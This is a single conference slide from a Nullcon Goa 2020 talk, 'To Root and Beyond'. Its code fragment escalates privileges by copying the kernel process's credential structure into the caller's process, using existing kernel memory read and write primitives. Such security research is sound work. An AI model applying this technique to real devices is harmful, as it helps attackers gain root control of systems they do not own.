Slide 46
Slide 46 text
Nullcon Goa 2020
To Root and Beyond
kptr_t kern_ucred = readKernelMemory64(kernel_proc + OFF(proc,
p_ucred));
writeKernelMemory32(kern_ucred + OFF(ucred, cr_ref), 0xcdef);
writeKernelMemory64(my_proc + OFF(proc, p_ucred), kern_ucred);